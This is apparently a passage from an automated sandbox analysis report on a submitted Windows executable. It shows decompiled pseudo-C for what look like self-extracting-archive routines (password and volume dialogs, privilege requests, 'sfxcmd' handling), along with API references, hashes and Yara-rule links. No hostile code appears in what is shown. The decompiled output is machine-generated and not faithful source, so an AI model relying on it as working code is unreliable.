									 *0x1f0860 = _t59;
									L16:
									E001B7A50(_t37);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t36 = _t36 + 4;
									_t55 =  &(_t55->i);
								} while ( *_t36 != 0);
								goto L15;
							}
							_t37 = _v12;
							goto L16;
						}
						 *0x1f085c = _v8 - 1;
						_t43 = _t64;
						_t64 = 0;
						 *0x1f0860 = _t43;
						goto L10;
					} else {
						_t44 = E001B7ECC();
						_push(0xc);
						_pop(0);
						 *_t44 = 0;
						L10:
						_t50 = 0;
						L17:
						E001B7A50(_t64);
						return _t50;
					}
				} else {
					_t45 = E001B7ECC();
					_t65 = 0x16;
					 *_t45 = _t65;
					E001B7DAB();
					return _t65;
				}
			}

0x001b6c73
0x001b6c80
0x001b6ca0
0x001b6cb3
0x001b6cb9
0x001b6cbf
0x001b6cc7
0x001b6cce
0x001b6cce
0x001b6cd3
0x001b6cda
0x001b6ce1
0x001b6cf3
0x001b6cfa
0x001b6d19
0x001b6d25
0x001b6d40
0x001b6d43
0x001b6d4a
0x001b6d50
0x001b6d57
0x001b6d5a
0x001b6d5c
0x001b6d60
0x001b6d6a
0x001b6d6a
0x001b6d6c
0x001b6d72
0x001b6d75
0x001b6d77
0x001b6d7d
0x001b6d7e
0x001b6d84
0x00000000
0x00000000
0x00000000
0x00000000
0x001b6d62
0x001b6d62
0x001b6d62
0x001b6d65
0x001b6d66
0x00000000
0x001b6d62
0x001b6d52
0x00000000
0x001b6d52
0x001b6d2b
0x001b6d30
0x001b6d32
0x001b6d34
0x00000000
0x001b6cfc
0x001b6cfc
0x001b6d01
0x001b6d03
0x001b6d04
0x001b6d39
0x001b6d39
0x001b6d87
0x001b6d88
0x00000000
0x001b6d91
0x001b6c88
0x001b6c88
0x001b6c8f
0x001b6c90
0x001b6c92
0x00000000
0x001b6c97

APIs

GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\YdACOWCggQ.exe,00000104), ref: 001B6CB3
_free.LIBCMT ref: 001B6D7E
_free.LIBCMT ref: 001B6D88

Strings

C:\Users\user\Desktop\YdACOWCggQ.exe, xrefs: 001B6CAA, 001B6CB1, 001B6CE0, 001B6D18

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\YdACOWCggQ.exe
API String ID: 2506810119-2147345565
Opcode ID: 70dbb44522589780d0f104056b780f07b64544e90bdacc46d94ab7e86be6f8ab
Instruction ID: b475e77a7f239867fa41b5558b946501373845df753e035f1f4b2355cec64a1b
Opcode Fuzzy Hash: 70dbb44522589780d0f104056b780f07b64544e90bdacc46d94ab7e86be6f8ab
Instruction Fuzzy Hash: A53192B1A04218AFCB22DF99DC819EEBBFCEFA9310F144066F84497251D7759E40CB90

Uniqueness

Uniqueness Score: -1.00%

Function 001973B9, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E001973B9(void* __ebx, void* __edx, void* __esi) {
				void* _t26;
				long _t32;
				void* _t39;
				void* _t42;
				intOrPtr _t43;
				void* _t52;
				void* _t57;
				void* _t58;
				void* _t61;

				_t57 = __esi;
				_t52 = __edx;
				_t42 = __ebx;
				E001AD870(E001C1321, _t61);
				E001AD940();
				 *((intOrPtr*)(_t61 - 0x20)) = 0;
				 *((intOrPtr*)(_t61 - 0x1c)) = 0;
				 *((intOrPtr*)(_t61 - 0x18)) = 0;
				 *((intOrPtr*)(_t61 - 0x14)) = 0;
				 *((char*)(_t61 - 0x10)) = 0;
				_t54 =  *((intOrPtr*)(_t61 + 8));
				_push(0);
				_push(0);
				 *((intOrPtr*)(_t61 - 4)) = 0;
				_push(_t61 - 0x20);
				if(E0019399D( *((intOrPtr*)(_t61 + 8)), _t52) != 0) {
					if( *0x1d0042 == 0) {
						if(E00197A15(L"SeSecurityPrivilege") != 0) {
							 *0x1d0041 = 1;
						}
						E00197A15(L"SeRestorePrivilege");
						 *0x1d0042 = 1;
					}
					_push(_t57);
					_t58 = 7;
					if( *0x1d0041 != 0) {
						_t58 = 0xf;
					}
					_push(_t42);
					_t43 =  *((intOrPtr*)(_t61 - 0x20));
					_push(_t43);
					_push(_t58);
					_push( *((intOrPtr*)(_t61 + 0xc)));
					if( *0x1cde80() == 0) {
						if(E0019B32C( *((intOrPtr*)(_t61 + 0xc)), _t61 - 0x106c, 0x800) == 0) {
							L10:
							E00196BF5(_t70, 0x52, _t54 + 0x1e,  *((intOrPtr*)(_t61 + 0xc)));
							_t32 = GetLastError();
							E001AE214(_t32);
							if(_t32 == 5 && E0019FC98() == 0) {
								E00191567(_t61 - 0x6c, 0x18);
								E001A0A9F(_t61 - 0x6c);
							}
							E00196E03(0x1d00e0, 1);
						} else {
							_t39 =  *0x1cde80(_t61 - 0x106c, _t58, _t43);
							_t70 = _t39;
							if(_t39 == 0) {
								goto L10;
							}
						}
					}
				}
				_t26 = E0019159C(_t61 - 0x20);
				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
				return _t26;
			}

0x001973b9
0x001973b9
0x001973b9
0x001973be
0x001973c8
0x001973d0
0x001973d3
0x001973d6
0x001973d9
0x001973dc
0x001973df
0x001973e4
0x001973e5
0x001973e6
0x001973ec
0x001973f4
0x00197401
0x0019740f
0x00197411
0x00197411
0x0019741d
0x00197422
0x00197422
0x00197430
0x00197433
0x00197434
0x00197438
0x00197438
0x00197439
0x0019743a
0x0019743d
0x0019743e
0x0019743f
0x0019744a
0x00197462
0x00197477
0x00197480
0x00197485
0x00197494
0x0019749c
0x001974ac
0x001974b4
0x001974b4
0x001974bd
0x00197464
0x0019746d
0x00197473
0x00197475
0x00000000
0x00000000
0x00197475
0x00197462
0x001974c3
0x001974c7
0x001974d0
0x001974da

APIs

__EH_prolog.LIBCMT ref: 001973BE

Part of subcall function 0019399D: __EH_prolog.LIBCMT ref: 001939A2

GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 00197485

Part of subcall function 00197A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 00197A24
Part of subcall function 00197A15: GetLastError.KERNEL32 ref: 00197A6A
Part of subcall function 00197A15: CloseHandle.KERNEL32(?), ref: 00197A79

Strings

SeRestorePrivilege, xrefs: 00197418
SeSecurityPrivilege, xrefs: 00197403

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 069532bd187b4d36f16b0aabbb29e61c9fa85ac6bd13d494fee396798848bfe4
Instruction ID: 0f70a4611037d0eb46a55db925e28ad217a3d3b302cc8837f6cdf2969edd3836
Opcode Fuzzy Hash: 069532bd187b4d36f16b0aabbb29e61c9fa85ac6bd13d494fee396798848bfe4
Instruction Fuzzy Hash: 0831C771A04204AADF21EB64DC41FFE7FB9AF65354F044059F409A7193C7748E84C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 001A9B8D, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E001A9B8D(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
				void* _t12;
				void* _t16;
				void* _t22;
				WCHAR** _t24;
				void* _t25;
				intOrPtr _t27;
				void* _t28;
				struct HWND__* _t30;
				signed short _t31;

				_t24 = _a16;
				_t31 = _a12;
				_t30 = _a4;
				_t27 = _a8;
				if(E001912D7(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
					L14:
					__eflags = 1;
					return 1;
				}
				_t28 = _t27 - 0x110;
				if(_t28 == 0) {
					_push( *_t24);
					 *0x1efe38 = _t24;
					L13:
					SetDlgItemTextW(_t30, 0x66, ??);
					goto L14;
				}
				if(_t28 != 1) {
					L6:
					return 0;
				}
				_t12 = (_t31 & 0x0000ffff) - 1;
				if(_t12 == 0) {
					GetDlgItemTextW(_t30, 0x66,  *( *0x1efe38), ( *0x1efe38)[1]);
					_push(1);
					L10:
					EndDialog(_t30, ??);
					goto L14;
				}
				_t16 = _t12 - 1;
				if(_t16 == 0) {
					_push(0);
					goto L10;
				}
				if(_t16 == 0x65) {
					_push(0);
					_push(E0019B943(__eflags,  *( *0x1efe38)));
					_push( *( *0x1efe38));
					_push(E0019DA42(_t25, 0x8e));
					_t22 = E001910B0(_t30);
					__eflags = _t22;
					if(_t22 == 0) {
						goto L14;
					}
					_push( *( *0x1efe38));
					goto L13;
				}
				goto L6;
			}

0x001a9b8e
0x001a9b93
0x001a9b98
0x001a9b9d
0x001a9bb5
0x001a9c45
0x001a9c47
0x00000000
0x001a9c47
0x001a9bbb
0x001a9bc1
0x001a9c34
0x001a9c36
0x001a9c3c
0x001a9c3f
0x00000000
0x001a9c3f
0x001a9bc6
0x001a9bda
0x00000000
0x001a9bda
0x001a9bcb
0x001a9bce
0x001a9c2a
0x001a9c30
0x001a9c14
0x001a9c15
0x00000000
0x001a9c15
0x001a9bd0
0x001a9bd3
0x001a9c12
0x00000000
0x001a9c12
0x001a9bd8
0x001a9be3
0x001a9bec
0x001a9bf2
0x001a9bfe
0x001a9c00
0x001a9c05
0x001a9c07
0x00000000
0x00000000
0x001a9c0e
0x00000000
0x001a9c0e
0x00000000

APIs

Part of subcall function 001912D7: GetDlgItem.USER32(00000000,00003021), ref: 0019131B
Part of subcall function 001912D7: SetWindowTextW.USER32(00000000,001C22E4), ref: 00191331

EndDialog.USER32(?,00000001), ref: 001A9C15
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 001A9C2A
SetDlgItemTextW.USER32(?,00000066,?), ref: 001A9C3F

Strings

ASKNEXTVOL, xrefs: 001A9BA5

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: 9bd386b9d521c2045c296780ba58f128de687d85c9991c312922489ff14bde54
Instruction ID: c5b4b638fbbb7480362f0545dc7f738f39f45a469f4a6da5c16310bd5ccf0af3
Opcode Fuzzy Hash: 9bd386b9d521c2045c296780ba58f128de687d85c9991c312922489ff14bde54
Instruction Fuzzy Hash: 2D112637304640BFD611AFA8ED48F6E3BA8EB5B710F150024F6019B0B6C762AAC39765

Uniqueness

Uniqueness Score: -1.00%

Function 0019CE52, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0019CE52(void* __ebx, void* __ecx, void* __edi) {
				void* __esi;
				intOrPtr _t26;
				signed int* _t30;
				void* _t31;
				void* _t34;
				void* _t42;
				void* _t44;
				void* _t46;
				void* _t48;
				void* _t49;
				void* _t50;

				_t44 = __edi;
				_t43 = __ecx;
				_t42 = __ebx;
				_t48 = _t49 - 0x64;
				_t50 = _t49 - 0xac;
				_t46 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
					 *((char*)(_t48 + 8)) = 0;
					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
						E001A11FA( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
					}
					_t26 =  *((intOrPtr*)(_t48 + 0x70));
					if(_t26 == 0) {
						E0019FA56(_t48 + 8, "s", 0x50);
					} else {
						_t34 = _t26 - 1;
						if(_t34 == 0) {
							_push(_t48 - 0x48);
							_push("$%s");
							goto L9;
						} else {
							if(_t34 == 1) {
								_push(_t48 - 0x48);
								_push("@%s");
								L9:
								_push(0x50);
								_push(_t48 + 8);
								E0019D9DC();
								_t50 = _t50 + 0x10;
							}
						}
					}
					_t16 = _t46 + 0x18; // 0x63
					_t18 = _t46 + 0x14; // 0xf46028
					_t30 = E001B4E71(_t42, _t43, _t44, _t46, _t48 + 0x58,  *_t18,  *_t16, 4, E0019CC88);
					if(_t30 == 0) {
						goto L1;
					} else {
						_t20 = 0x1cd158 +  *_t30 * 0xc; // 0x1c33e0
						E001B54E0( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
						_t31 = 1;
					}
				} else {
					L1:
					_t31 = 0;
				}
				return _t31;
			}

0x0019ce52
0x0019ce52
0x0019ce52
0x0019ce53
0x0019ce57
0x0019ce5e
0x0019ce64
0x0019ce74
0x0019ce7a
0x0019ce7e
0x0019ce81
0x0019ce8c
0x0019ce8c
0x0019ce94
0x0019ce97
0x0019ced2
0x0019ce99
0x0019ce99
0x0019ce9c
0x0019ceb1
0x0019ceb2
0x00000000
0x0019ce9e
0x0019cea1
0x0019cea6
0x0019cea7
0x0019ceb7
0x0019ceba
0x0019cebc
0x0019cebd
0x0019cec2
0x0019cec2
0x0019cea1
0x0019ce9c
0x0019cede
0x0019cee4
0x0019cee8
0x0019cef2
0x00000000
0x0019cef8
0x0019cefe
0x0019cf07
0x0019cf0f
0x0019cf0f
0x0019ce66
0x0019ce66
0x0019ce66
0x0019ce66
0x0019cf16

APIs

__fprintf_l.LIBCMT ref: 0019CEBD
_strncpy.LIBCMT ref: 0019CF07

Strings

$%s, xrefs: 0019CEB2
@%s, xrefs: 0019CEA7

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: 8e32a42931debe4259b15aed91fda1e8b4adc5f4cfb9710d0c30d8a40c7fa226
Instruction ID: 9a8c7e85f7bf7917fc05912e79f603e1214b7471701ace55f115c398a22bad87
Opcode Fuzzy Hash: 8e32a42931debe4259b15aed91fda1e8b4adc5f4cfb9710d0c30d8a40c7fa226
Instruction Fuzzy Hash: D4219D7284030CAFEF20DFA4CD05FEE3FA8AB15740F044026FE55961A2E371D6559BA1

Uniqueness

Uniqueness Score: -1.00%

Function 001AA0B0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E001AA0B0(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
				short _v260;
				void* __ebx;
				void* _t15;
				signed short _t24;
				struct HWND__* _t28;
				intOrPtr _t29;
				void* _t30;

				_t24 = _a12;
				_t29 = _a8;
				_t28 = _a4;
				if(E001912D7(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
					L10:
					return 1;
				}
				_t30 = _t29 - 0x110;
				if(_t30 == 0) {
					SetDlgItemTextW(_t28, 0x67, _a16);
					goto L10;
				}
				if(_t30 != 1) {
					L5:
					return 0;
				}
				_t15 = (_t24 & 0x0000ffff) - 1;
				if(_t15 == 0) {
					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
					E0019E90C(_t24, 0x1e5c00,  &_v260);
					E0019E957( &_v260, 0x80);
					_push(1);
					L7:
					EndDialog(_t28, ??);
					goto L10;
				}
				if(_t15 == 1) {
					_push(0);
					goto L7;
				}
				goto L5;
			}

0x001aa0ba
0x001aa0be
0x001aa0c2
0x001aa0db
0x001aa14a
0x00000000
0x001aa14c
0x001aa0dd
0x001aa0e3
0x001aa144
0x00000000
0x001aa144
0x001aa0e8
0x001aa0f7
0x00000000
0x001aa0f7
0x001aa0ed
0x001aa0f0
0x001aa116
0x001aa128
0x001aa135
0x001aa13a
0x001aa0fd
0x001aa0fe
0x00000000
0x001aa0fe
0x001aa0f5
0x001aa0fb
0x00000000
0x001aa0fb
0x00000000

APIs

Part of subcall function 001912D7: GetDlgItem.USER32(00000000,00003021), ref: 0019131B
Part of subcall function 001912D7: SetWindowTextW.USER32(00000000,001C22E4), ref: 00191331

EndDialog.USER32(?,00000001), ref: 001AA0FE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 001AA116
SetDlgItemTextW.USER32(?,00000067,?), ref: 001AA144

Strings

GETPASSWORD1, xrefs: 001AA0C9

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1
API String ID: 445417207-3292211884
Opcode ID: 1823099b82d81c8600824940d94bd3adce72ea577194971edcbfc78ab46e7758
Instruction ID: 22d058a770c1e9d9e4afa15a4a926b8fa83a488868b6a226dcaf105f6535d9e6
Opcode Fuzzy Hash: 1823099b82d81c8600824940d94bd3adce72ea577194971edcbfc78ab46e7758
Instruction Fuzzy Hash: 4B110436940219B7DB219E689D49FFF7B7CEF1B710F810025FA45F2080C7A5D991C662

Uniqueness

Uniqueness Score: -1.00%

Function 0019B1B7, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E0019B1B7(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
				short _t10;
				void* _t13;
				signed int _t14;
				short* _t20;
				void* _t23;
				signed short* _t27;
				signed int _t29;
				signed int _t31;

				_t20 = _a8;
				_t27 = _a4;
				 *_t20 = 0;
				_t10 = E0019B4C6(_t27);
				if(_t10 == 0) {
					_t29 = 0x5c;
					if( *_t27 == _t29 && _t27[1] == _t29) {
						_push(_t29);
						_push( &(_t27[2]));
						_t10 = E001B0BB8(__ecx);
						_pop(_t23);
						if(_t10 != 0) {
							_push(_t29);
							_push(_t10 + 2);
							_t13 = E001B0BB8(_t23);
							if(_t13 == 0) {
								_t14 = E001B2B33(_t27);
							} else {
								_t14 = (_t13 - _t27 >> 1) + 1;
							}
							asm("sbb esi, esi");
							_t31 = _t29 & _t14;
							E001B4DDA(_t20, _t27, _t31);
							_t10 = 0;
							 *((short*)(_t20 + _t31 * 2)) = 0;
						}
					}
					return _t10;
				}
				return E00193E41(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
			}

0x0019b1b8
0x0019b1bf
0x0019b1c4
0x0019b1c7
0x0019b1ce
0x0019b1eb
0x0019b1ef
0x0019b1fa
0x0019b1fb
0x0019b1fc
0x0019b202
0x0019b205
0x0019b20a
0x0019b20b
0x0019b20c
0x0019b215
0x0019b21f
0x0019b217
0x0019b21b
0x0019b21b
0x0019b229
0x0019b22b
0x0019b230
0x0019b238
0x0019b23a
0x0019b23a
0x0019b205
0x00000000
0x0019b23e
0x00000000

APIs

_swprintf.LIBCMT ref: 0019B1DE

Part of subcall function 00193E41: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00193E54

_wcschr.LIBVCRUNTIME ref: 0019B1FC
_wcschr.LIBVCRUNTIME ref: 0019B20C

Strings

%c:\, xrefs: 0019B1D4

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 1cc9b72273620878ba992ab7ac7480ada6f7352b270faab555e87a34b377aae5
Instruction ID: bd181fe1d47def878e8d2076933a57d87fe014724916e2cabd1c5f3091fe6cf0
Opcode Fuzzy Hash: 1cc9b72273620878ba992ab7ac7480ada6f7352b270faab555e87a34b377aae5
Instruction Fuzzy Hash: 9201B95350931166DE316B75ADC6DAFB7ACDE69B60B50841AFC44C7182FB30E854C2B1

Uniqueness

Uniqueness Score: -1.00%

Function 001A0326, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E001A0326(long* __ecx, long _a4) {
				void* __esi;
				void* __ebp;
				long _t11;
				void* _t14;
				long _t23;
				long* _t25;

				_t19 = __ecx;
				_t11 = _a4;
				_t25 = __ecx;
				_t23 = 0x40;
				 *__ecx = _t11;
				if(_t11 > _t23) {
					 *__ecx = _t23;
				}
				if( *_t25 == 0) {
					 *_t25 = 1;
				}
				_t25[0x41] = 0;
				if( *_t25 > _t23) {
					 *_t25 = _t23;
				}
				_t3 =  &(_t25[0xc8]); // 0x320
				_t25[0xc5] = 0;
				InitializeCriticalSection(_t3);
				_t25[0xc6] = CreateSemaphoreW(0, 0, _t23, 0);
				_t14 = CreateEventW(0, 1, 1, 0);
				_t25[0xc7] = _t14;
				if(_t25[0xc6] == 0 || _t14 == 0) {
					_push(L"\nThread pool initialization failed.");
					_push(0x1d00e0);
					E00196CC9(E00196CCE(_t19), 0x1d00e0, _t25, 2);
				}
				_t25[0xc3] = 0;
				_t25[0xc4] = 0;
				_t25[0x42] = 0;
				return _t25;
			}

0x001a0326
0x001a0326
0x001a032e
0x001a0332
0x001a0333
0x001a0337
0x001a0339
0x001a0339
0x001a0342
0x001a0344
0x001a0344
0x001a0346
0x001a034e
0x001a0350
0x001a0350
0x001a0352
0x001a0358
0x001a035f
0x001a0373
0x001a0379
0x001a037f
0x001a038b
0x001a0391
0x001a039b
0x001a03a7
0x001a03a7
0x001a03ad
0x001a03b5
0x001a03bb
0x001a03c4

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0019A865,00000008,00000000,?,?,0019C802,?,00000000,?,00000001,?), ref: 001A035F
CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0019A865,00000008,00000000,?,?,0019C802,?,00000000), ref: 001A0369
CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0019A865,00000008,00000000,?,?,0019C802,?,00000000), ref: 001A0379

Strings

Thread pool initialization failed., xrefs: 001A0391

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID: Create$CriticalEventInitializeSectionSemaphore
String ID: Thread pool initialization failed.
API String ID: 3340455307-2182114853
Opcode ID: 3322df7e2b5185fee912d9a3a4b8c110418cb82895180b5495951a629cb6672a
Instruction ID: a8a8fae24cffdf0b485545c3cc053ae4dc8a5bed0bcf8837f48432caa39ac190
Opcode Fuzzy Hash: 3322df7e2b5185fee912d9a3a4b8c110418cb82895180b5495951a629cb6672a
Instruction Fuzzy Hash: 111130B5500708AFD7225F769C84AABFBECFF6A755F10482EF1DA86201D7716980CB60

Uniqueness

Uniqueness Score: -1.00%

Function 001AC96E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E001AC96E(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				long _v0;
				_Unknown_base(*)()* _t16;
				int _t22;
				WCHAR* _t25;

				 *0x1ece10 = _a12;
				 *0x1ece14 = _a16;
				 *0x1d75f4 = _a20;
				if( *0x1d75d3 == 0) {
					if( *0x1d75d2 == 0) {
						_t16 = E001AAFB9;
						_t25 = L"REPLACEFILEDLG";
						while(1) {
							_t22 = DialogBoxParamW( *0x1d0064, _t25,  *0x1d75c8, _t16, _a4);
							if(_t22 != 4) {
								break;
							}
							if(DialogBoxParamW( *0x1d0060, L"RENAMEDLG",  *0x1d75d8, E001AC2A7, _v0) != 0) {
								break;
							}
						}
						return _t22;
					}
					return 1;
				}
				return 0;
			}

0x001ac979
0x001ac982
0x001ac98b
0x001ac990
0x001ac99d
0x001ac9ae
0x001ac9b3
0x001ac9da
0x001ac9ee
0x001ac9f3
0x00000000
0x00000000
0x001ac9d8
0x00000000
0x00000000
0x001ac9d8
0x00000000
0x001ac9fa
0x00000000
0x001ac9a1
0x00000000

Strings

RENAMEDLG, xrefs: 001AC9C9
REPLACEFILEDLG, xrefs: 001AC9B3, 001AC9E5

Memory Dump Source

Source File: 00000000.00000002.288603648.0000000000191000.00000020.00020000.sdmp, Offset: 00190000, based on PE: true

Associated: 00000000.00000002.288597781.0000000000190000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288634077.00000000001C2000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.288643779.00000000001CD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288650289.00000000001D4000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288658464.00000000001F0000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.288663647.00000000001F1000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: efcbbcc5f56ac0fbdfed6e000527a8fc796635f80b2222f679902907d193332c
Instruction ID: 1d95dc2d65c10db194e437dfd808561d5d9302b215bc070d9d95cb2d8d3d1a9a
Opcode Fuzzy Hash: efcbbcc5f56ac0fbdfed6e000527a8fc796635f80b2222f679902907d193332c
Instruction Fuzzy Hash: 9901D47620A206AFC7019B58FD40F67BBE9E74A794F000427F451E2670D7329C91DBE2

Uniqueness

Uniqueness Score: -1.00%

Function 001AC891, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 66%

			E001AC891(void* __eflags, WCHAR* _a4) {
				char _v8196;
				int _t7;
				WCHAR* _t12;
				void* _t14;

				_t14 = __eflags;
				E001AD940();
				SetEnvironmentVariableW(L"sfxcmd", _a4);
				_t7 = E0019F835(_t14, _a4,  &_v8196, 0x1000);
				_t12 = _t7;
				if(_t12 != 0) {
					_push( *_t12 & 0x0000ffff);
					while(E0019F94C() != 0) {
						_t12 =  &(_t12[1]);
						__eflags = _t12;
						_push( *_t12 & 0x0000ffff);
					}
					_t7 = SetEnvironmentVariableW(L"sfxpar", _t12);
				}
				return _t7;
			}

0x001ac891
0x001ac899
0x001ac8a7
0x001ac8bc
0x001ac8c1
0x001ac8c5
0x001ac8ca
0x001ac8d4
0x001ac8cd
0x001ac8cd
0x001ac8d3
0x001ac8d3
0x001ac8e3
0x001ac8e3
0x001ac8ed

APIs

SetEnvironmentVariableW.KERNEL32(sfxcmd,?), ref: 001AC8A7
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 001AC8E3

Strings

sfxcmd, xrefs: 001AC8A2
